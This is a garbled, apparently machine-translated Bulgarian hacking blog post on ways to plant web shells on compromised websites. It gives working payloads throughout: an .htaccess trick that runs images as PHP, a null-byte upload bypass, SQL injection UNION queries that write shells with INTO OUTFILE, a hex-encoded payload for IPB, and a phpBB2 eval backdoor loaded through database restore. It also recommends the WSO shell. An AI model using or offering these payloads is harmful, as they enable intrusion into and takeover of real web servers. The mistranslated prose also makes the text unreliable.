Начини за попълване черупка, експлозивна блог

Здравейте% потребителско име% и приятелите му. Е, това е необходимо спешно да се запълни една черупка на сайта, добре, никога не се знае, може да е таксата за окончателното зависи от това. Е, това не работи. Ето няколко примера, събрани (благодарение на Трейси и други за това).

Изсипете чрез картината на обвивката

Можете хакнат сайта (разбира се само за тестване) с samopisnaya администратор ... И не може да се излива уеб черупка, но присъстват запълване на снимки и файлове за изтегляне само формат .jpg. GIF. PNG.
В този случай, може да се направи?

Piha черупка с .gif разширение в това, което някои папка с изображения, и да създадете файл .htaccess със съдържанието на

AddType заявление / х-уеб--PHP .gif
Тази команда ще форматирате .gif като PHP
Ние се опитваме да отворите [път] /shell.gif

По същия начин, ако скриптът не е безразличен към линията на транспортиране, ние се опитваме да запълни черупка преминава преименуването го shell.php% 00.jpg. проверите наличността shell.php, и изведнъж?

изливане процес през черупката на mysql.user вой

1) Научете изпод някой да седнем и да се учат като правата му към MySQL.

site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Ние се учим от това, което ние сме седнали)
2) потребител site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user='наш '+ - +






(Вижте нашите привилегии на потребителя. Ако дава грешка в изхода, можете да poheksit нашите потребители 0x)
3) site.com/index.php?id=-1+union+select+1, '', 3 + от + mysql.user + в + outfile + "Пътят към файла '+ - +
(Напълнете мини-черупка)
P.S
Какво ще получите всичко това право има право да записва и да знаят пълния път до корена.
Просто проверете правата за запис, можете да:

site.com/index.php?id=1+and+1=0+union+Select+1,'prava ', 3 + от + mysql.user + - +
Ако Права показва, и точно там.

Следващата ситуация. Ние сме в администратор форуми,

Залез:
Plugins # 038; Продукти -> Plugin Manager -> [Add New Plugin] Plugins # 038; Продукти -> Plugin Manager -> [Добавяне на нов плъгин]

Изборът temptley. Обикновено избират faq_complete, изберете и щракнете върху приставката е активна отметка излагайте «Да» и спаси.

По-нататък ще се получи phpinfo ()

Ако ние взехме phpinfo (), след това помислете за строеж в нашите ръце.

По-късно през phpinfo трябва да намерите пълния път до форума (напр /home/u0000/site.ru/www/sell.php). На следващо място, ние се нуждаем нашия уеб черупка се превръща в TXT файл и попълнете за всеки сайт
mysite.com/shell.txt
Shell излее отбор

Напълнете черупка в IPB 3

Залез:
Подкрепа-> SQL- Management> Изпълнява protsessy-> Направи ново искане

код:
изберете 0x3c3f706870696e666f28293b3f3e в outfile "Z: /home/site.ru/www/uploads/shell.php"
Пълният път може да се намери, както следва:

Напълнете черупка в PHPBB 2

1. Създайте файл ex.sql
2. предписва

UPDATE phpbb_users SET user_sig_bbcode_uid =, user_sig = '/ E \ 0 (+).' ': PHPBB EVAL (stripslashes ($ _ GET [е])); " КЪДЕТО USER_ID = 2;
Когато USER_ID = 2 - администратор ID

3. Отидете до администраторския панел
4. В администраторския панел, изберете елемента "Възстановяване на база данни" и натоварване ex.sql
5. Извършване на код / ​​Fill черупка така

Това е само кратък списък на това как и при какви двигатели могат да попълнят черупката. Нуждаете се от повече? Добре дошли в момчетата на rdot
Попълнете във форумите
Попълнете ССФ
А това е любимата ми черупка, също на rdot))
WSO